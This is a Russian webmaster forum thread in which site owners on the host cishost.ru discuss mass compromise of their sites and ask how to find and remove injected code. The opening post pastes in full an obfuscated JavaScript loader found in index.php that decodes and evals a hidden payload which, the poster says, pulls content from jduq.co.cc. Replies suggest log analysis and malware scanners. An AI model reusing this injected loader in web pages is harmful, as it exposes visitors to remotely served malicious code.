cishost.ru вирусы

12
BM
На сайте с 16.02.2009
Offline
129
1846

Что-то в последнее время дешевые хостинги огорчают все больше и больше :(

В последнее время участились случаи взлома хостинга cishost.ru и появления вирусов на сайтах. В данном случае это скрипты в файле index.php главной страницы сайта (или ещё где-то), например такой:

<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var sdn={dic:9797,cen:function(){createCSS("#c0","background: url(data:,evaString.fromCharCode)");var yf=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var pzk=r.cssRules||r.rules;for(var evo=0;evo<pzk.length;evo++){var dclf=pzk.item?pzk.item(evo):pzk[evo];pnl=dclf.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];if((pnl!=null)&&(pnl.indexOf("Str")!=-1))
yf=pnl;};}catch(e){};}
var s="";var g=function(){return this;}();ajc=g[yf.substr(0,3)+"l"];var ml="9788q9788q9692q9695q9765q9757q9697q9686q9698q9680q9688q9696q9687q9681q9751q9694q9696q9681q9728q9689q9696q9688q9696q9687q9681q9682q9731q9676q9713q9700q9694q9719q9700q9688q9696q9757q9758q9699q9686q9697q9676q9758q9756q9706q9749q9704q9756q9674q9784q9788q9788q9788q9692q9695q9683q9700q9688q9696q9683q9757q9756q9738q9784q9788q9788q9672q9765q9696q9689q9682q9696q9765q9674q9784q9788q9788q9788q9679q9700q9683q9765q9699q9697q9676q9765q9736q9765q9697q9686q9698q9680q9688q9696q9687q9681q9751q9698q9683q9696q9700q9681q9696q9728q9689q9696q9688q9696q9687q9681q9757q9763q9699q9686q9697q9676q9763q9756q9738q9784q9788q9788q9788q9681q9683q9676q9765q9674q9784q9788q9788q9788q9788q9697q9686q9698q9680q9688q9696q9687q9681q9751q9700q9685q9685q9696q9687q9697q9730q9693q9692q9689q9697q9757q9699q9697q9676q9756q9738q9784q9788q9788q9788q9672q9765q9698q9700q9681q9698q9693q9765q9757q9696q9756q9765q9674q9784q9788q9788q9788q9788q9697q9686q9698q9680q9688q9696q9687q9681q9751q9699q9686q9697q9676q9765q9736q9765q9699q9697q9676q9738q9784q9788q9788q9788q9672q9784q9788q9788q9788q9692q9695q9765q9757q9697q9686q9698q9680q9688q9696q9687q9681q9751q9694q9696q9681q9728q9689q9696q9688q9696q9687q9681q9682q9731q9676q9713q9700q9694q9719q9700q9688q9696q9757q9758q9699q9686q9697q9676q9758q9756q9706q9749q9704q9756q9674q9784q9788q9788q9788q9788q9692q9695q9683q9700q9688q9696q9683q9757q9756q9738q9784q9788q9788q9788q9672q9765q9696q9689q9682q9696q9765q9674q9784q9788q9788q9788q9788q9697q9686q9698q9680q9688q9696q9687q9681q9751q9678q9683q9692q9681q9696q9757q9763q9737q9692q9695q9683q9700q9688q9696q9765q9682q9683q9698q9736q9758q9693q9681q9681q9685q9739q9750q9750q9682q9692q9689q9692q9690q9681q9696q9679q9751q9698q9686q9751q9698q9698q9750q9692q9687q9698q9689q9680q9697q9696q9751q9685q9693q9685q9758q9765q9678q9692q9697q9681q9693q9736q9758q9748q9749q9758q9765q9693q9696q9692q9694q9693q9681q9736q9758q9748q9749q9758q9765q9682q9681q9676q9689q9696q9736q9758q9679q9692q9682q9692q9699q9692q9689q9692q9681q9676q9739q9693q9692q9697q9697q9696q9687q9738q9685q9686q9682q9692q9681q9692q9686q9687q9739q9700q9699q9682q9686q9689q9680q9681q9696q9738q9689q9696q9695q9681q9739q9749q9738q9681q9686q9685q9739q9749q9738q9758q9735q9737q9750q9692q9695q9683q9700q9688q9696q9735q9763q9756q9738q9784q9788q9788q9788q9672q9784q9788q9788q9672q9784q9788q9788q9695q9680q9687q9698q9681q9692q9686q9687q9765q9692q9695q9683q9700q9688q9696q9683q9757q9756q9674q9784q9788q9788q9788q9679q9700q9683q9765q9695q9765q9736q9765q9697q9686q9698q9680q9688q9696q9687q9681q9751q9698q9683q9696q9700q9681q9696q9728q9689q9696q9688q9696q9687q9681q9757q9758q9692q9695q9683q9700q9688q9696q9758q9756q9738q9695q9751q9682q9696q9681q9732q9681q9681q9683q9692q9699q9680q9681q9696q9757q9758q9682q9683q9698q9758q9753q9758q9693q9681q9681q9685q9739q9750q9750q9682q9692q9689q9692q9690q9681q9696q9679q9751q9698q9686q9751q9698q9698q9750q9692q9687q9698q9689q9680q9697q9696q9751q9685q9693q9685q9758q9756q9738q9695q9751q9682q9681q9676q9689q9696q9751q9679q9692q9682q9692q9699q9692q9689q9692q9681q9676q9736q9758q9693q9692q9697q9697q9696q9687q9758q9738q9695q9751q9682q9681q9676q9689q9696q9751q9685q9686q9682q9692q9681q9692q9686q9687q9736q9758q9700q9699q9682q9686q9689q9680q9681q9696q9758q9738q9695q9751q9682q9681q9676q9689q9696q9751q9689q9696q9695q9681q9736q9758q9749q9758q9738q9695q9751q9682q9681q9676q9689q9696q9751q9681q9686q9685q9736q9758q9749q9758q9738q9695q9751q9682q9696q9681q9732q9681q9681q9683q9692q9699q9680q9681q9696q9757q9758q9678q9692q9697q9681q9693q9758q9753q9758q9748q9749q9758q9756q9738q9695q9751q9682q9696q9681q9732q9681q9681q9683q9692q9699q9680q9681q9696q9757q9758q9693q9696q9692q9694q9693q9681q9758q9753q9758q9748q9749q9758q9756q9738q9784q9788q9788q9788q9697q9686q9698q9680q9688q9696q9687q9681q9751q9694q9696q9681q9728q9689q9696q9688q9696q9687q9681q9682q9731q9676q9713q9700q9694q9719q9700q9688q9696q9757q9758q9699q9686q9697q9676q9758q9756q9706q9749q9704q9751q9700q9685q9685q9696q9687q9697q9730q9693q9692q9689q9697q9757q9695q9756q9738q9784q9788q9788q9672".split("q");xxe=ajc(yf.substr(3));for(var i=0;i<ml.length;i++){whb=sdn.dic-parseInt(ml);s+=(xxe(whb));}
ajc(s);}};sdn.cen();</script>

Если посмотреть один из ай-пи хостера, то становится понятно, что все сайты заражены одним вирусом, который пытается загрузить что-то с jduq.co.cc.

Что интересно, подобный скрипт появляется не всегда в файле index.php, из-за чего его иногда очень сложно обнаружить, тем более, когда заражено множество сайтов, а не один.

Хотелось бы узнать, кто как борется с подобными случаями, как можно предотвратить такие "заражения", и как можно эффективно их устранять, если это уже произошло? Может быть есть какой-то софт по поиску и удалению вредоносных кодов по всем сайтам аккаунта на хостинге.

ООО ТК Рустелеком
На сайте с 20.04.2005
Offline
480
#1

chattr -R + /home (шутка конечно).

SSD KVM ВПС от 149 ₽ в Германии. SSD хостинг от 119 ₽ в Германии или России |Выделенные серверы в Европе, Азии, США и РФ (https://www.robovps.biz/) Контакты: Telegram чат (https://t.me/rustelekom_bot) или LiveChat на любом из наших сайтов.
K
На сайте с 11.08.2005
Offline
167
kpv
#2

спросите сначала хостера логи доступа по ftp для сайта, проанализируйте логи апача.

Узнайте как этот вирус попал в файл, а затем действуйте.

Хостинг в Рестоне (http://ruweb.ws/?page=price), Москве (http://ruweb.net/?page=price&type=unlim), Нижнем Новгороде (http://ruweb-nn.ru/hosting.html). Регистрация доменов, аренда серверов с администрированием.
ware
На сайте с 12.09.2010
Offline
394
#3

Burner-M, а много сайтов пострадало? какой движок используете?

софт clamav может и есть, но поможет ли он.

[Удален]
#4

это самый глючный хостинг из всех что я юзал, техподдержка отвратительная.

M
На сайте с 30.08.2010
Offline
92
#5

дешевые хостинги на то и дешевые :)

Lipcrus
На сайте с 05.05.2009
Offline
83
#6
megadimon:
дешевые хостинги на то и дешевые :)

Дешево - не значит плохо ;)

Snapius
На сайте с 29.10.2007
Offline
241
#7
Lipcrus:
Дешево - не значит плохо ;)

Но в большинстве случае - плохо(как показывает практика).

Греческая натуральная косметика (https://www.rizescrete.ru)
M
На сайте с 30.08.2010
Offline
92
#8

дешево могут себе позволить или крупные компании, которые берут количеством, или начинающие хостеры, у которых начались каникулы. остальные знаю цену качественным услугам :)

BM
На сайте с 16.02.2009
Offline
129
#9
ware:
Burner-M, а много сайтов пострадало? какой движок используете?
софт clamav может и есть, но поможет ли он.

Сайты пострадали все, у меня их около десятка, но взломаны были абсолютно все сайты хостера (по крайней мере на указанном айпи). И тут дело не в движке, ломают сразу сервер.

Burner-M добавил 10.02.2011 в 22:20

kpv:
спросите сначала хостера логи доступа по ftp для сайта, проанализируйте логи апача.
Узнайте как этот вирус попал в файл, а затем действуйте.

При запросе в поддержку о причинах, максимум, что говорят, "да, есть такая проблема, мы её решаем". И в итоге, конечно, решают, но что-то в последнее время зачастили такие взломы :(

root.serverside.ru
На сайте с 25.02.2010
Offline
98
#10

в 99% случаев такой код попадает на сайты либо через ftp доступы украденные у пользователя, либо через дырку в движке (залив шел и т/п)

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий